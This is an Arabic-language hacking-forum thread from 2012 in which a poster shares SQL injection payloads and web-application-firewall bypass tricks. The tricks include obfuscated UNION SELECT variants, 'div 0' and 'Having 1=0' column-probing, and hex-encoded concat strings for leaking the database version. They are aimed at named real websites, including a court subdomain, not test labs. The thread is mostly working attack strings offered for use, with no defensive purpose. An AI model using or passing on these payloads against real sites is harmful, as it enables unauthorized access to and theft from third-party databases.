التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-22-2012, 01:11 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 

 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road

. sql Injection Professional & many WAF Bypassing TRK


بعض المشاكل في الحقن وكيف تخطيها

:: like ::
كود PHP:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ version() --+ 


open source page : press Ctrl+f and typ 5.0

and to avoid Source Code Injection and appear info inside img in mean page

use
اقتباس
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

or
اقتباس
concat(0x273e27,version(),0x3c212d2d)



كود PHP:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+ 






sql Injection Professional & many WAF Bypassing TRK

التوقيع

 

   

رد مع اقتباس
قديم 07-22-2012, 01:18 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 

 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road

افتراضي رد: sql Injection Professional & many WAF Bypassing TRK



(2)
كود PHP:
jumble.dibbaa.com/article.php?id=7' union select 1,2,3,4,5,6,7,8 +--+ 
\

no column appear in page i will use div+0 i will put it befor union select

or use one of this

اقتباس
div+0
Having+1=0
AND+1=0
/*!and*/+1=0
and(1)=(0) x

OR false the url query

id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

كود PHP:
jumble.dibbaa.com/article.php?id=7' div 0 union select 1,2,3,4,5,6,7,8 +--+ 




التوقيع

 

   

رد مع اقتباس
قديم 07-22-2012, 01:26 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية CODE3
 

 

 
إحصائية العضو





CODE3 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
CODE3 is on a distinguished road

افتراضي رد: sql Injection Professional & many WAF Bypassing TRK


كود PHP:
http://www.phm.ie/project.php?cat=Conservation 
u can use many method to bypassing Forbidden

like

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

كود PHP:
http://www.phm.ie/project.php?cat=Conservation' +and(1)=(0) +union+distinct+select+ 1,version(),3,4,5,6,7,8,9,10-- - 
and use and 1=0 to apear column nmb in the page

or

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
التوقيع

 


التعديل الأخير تم بواسطة CODE3 ; 07-22-2012 الساعة 01:33 PM.

   

رد مع اقتباس
قديم 07-22-2012, 01:49 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي رد: sql Injection Professional & many WAF Bypassing TRK


شكراً لك بس انا وضعت شرح كيف تتخطى الحقن في السورس

التوقيع

ABO-SAGER

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:08 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0